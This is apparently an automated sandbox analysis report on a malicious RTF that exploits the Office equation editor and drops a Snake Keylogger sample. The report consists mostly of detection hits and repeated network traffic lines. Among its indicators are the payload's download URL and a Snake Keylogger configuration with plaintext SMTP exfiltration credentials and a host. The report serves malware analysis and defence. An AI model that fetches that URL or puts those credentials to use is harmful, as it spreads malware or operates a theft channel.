5.2.rinzearec84736.exe.33745d8.10.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x585b0:$a1: get_encryptedPassword 0x785d0:$a1: get_encryptedPassword 0x983f0:$a1: get_encryptedPassword 0x5889c:$a2: get_encryptedUsername 0x788bc:$a2: get_encryptedUsername 0x986dc:$a2: get_encryptedUsername 0x583bc:$a3: get_timePasswordChanged 0x783dc:$a3: get_timePasswordChanged 0x981fc:$a3: get_timePasswordChanged 0x584b7:$a4: get_passwordField 0x784d7:$a4: get_passwordField 0x982f7:$a4: get_passwordField 0x585c6:$a5: set_encryptedPassword 0x785e6:$a5: set_encryptedPassword 0x98406:$a5: set_encryptedPassword 0x59bb8:$a7: get_logins 0x79bd8:$a7: get_logins 0x999f8:$a7: get_logins 0x59b1b:$a10: KeyLoggerEventArgs 0x79b3b:$a10: KeyLoggerEventArgs 0x9995b:$a10: KeyLoggerEventArgs
Click to see the 46 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 208.67.105.179, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1236, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1236, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\arinzezx[1].exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf

ReversingLabs: Detection: 20%

Antivirus detection for URL or domain

Source: http://208.67.105.179/arinzezx.exej	Avira URL Cloud: Label: malware
Source: http://208.67.105.179/arinzezx.exe	Avira URL Cloud: Label: malware
Source: http://208.67.105.179/arinzezx.exemmC:	Avira URL Cloud: Label: malware
Source: http://208.67.105.179/arinzezx.exeC:	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\arinzezx[1].exe	ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	ReversingLabs: Detection: 40%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\arinzezx[1].exe	Joe Sandbox ML: detected

Source: 6.0.rinzearec84736.exe.400000.0.unpack

Avira: Label: TR/ATRAPS.Gen

Source: 6.0.rinzearec84736.exe.400000.0.unpack

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "arinzelog@saonline.xyz", "Password": "7213575aceACE@#$", "Host": "cp5ua.hyperhost.ua", "Port": "587"}

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\rinzearec84736.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\rinzearec84736.exe			Jump to behavior

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 208.67.105.179 Port: 80

Jump to behavior

Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org

Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 001C4FDFh	6_2_001C4CA8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 001CDF89h	6_2_001CDCDC
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 001CE3E1h	6_2_001CE129
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 001C4029h	6_2_001C3D69
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 001CE839h	6_2_001CE580
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 001C543Fh	6_2_001C5181
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 001C45EAh	6_2_001C41D8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 001CEC91h	6_2_001CE9D9
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 001C589Fh	6_2_001C55E1
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 001CF0E9h	6_2_001CEE30
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 001C5CFFh	6_2_001C5A40
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 001CF541h	6_2_001CF288
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 001C615Fh	6_2_001C5EA0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 001CF999h	6_2_001CF6E0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 001CFDF1h	6_2_001CFB38
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 001C45EAh	6_2_001C4519
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_001C2D1A
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 001C3CA6h	6_2_001C35D0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_001C2EF9
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_001C26E8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00269AD1h	6_2_00269828
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 002618A9h	6_2_00261600
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 002632B9h	6_2_00263010
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00263711h	6_2_00263468
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00266F11h	6_2_00266C68
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 002602F1h	6_2_00260048
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 002684F1h	6_2_00268248
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00261D01h	6_2_00261A58
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00260749h	6_2_002604A0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00268949h	6_2_002686A0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00262159h	6_2_00261EB0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00269F29h	6_2_00269C80
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00267391h	6_2_002670E8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00260BA1h	6_2_002608F8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 0026A381h	6_2_0026A0D8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00268DCAh	6_2_00268B20
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 0026A7D9h	6_2_0026A530
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 002625B1h	6_2_00262308
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00262A09h	6_2_00262760
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00269221h	6_2_00268F78
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 002677E9h	6_2_00267540
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00260FF9h	6_2_00260D50
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00261451h	6_2_002611A8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00262E61h	6_2_00262BB8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 0026AC31h	6_2_0026A988
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00267C41h	6_2_00267998
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00268099h	6_2_00267DF0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then jmp 00269679h	6_2_002693D0
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_00264EA8
Source: C:\Users\user\AppData\Roaming\rinzearec84736.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	6_2_002651BE

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 208.67.105.179:80
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 208.67.105.179:80 -> 192.168.2.22:49171
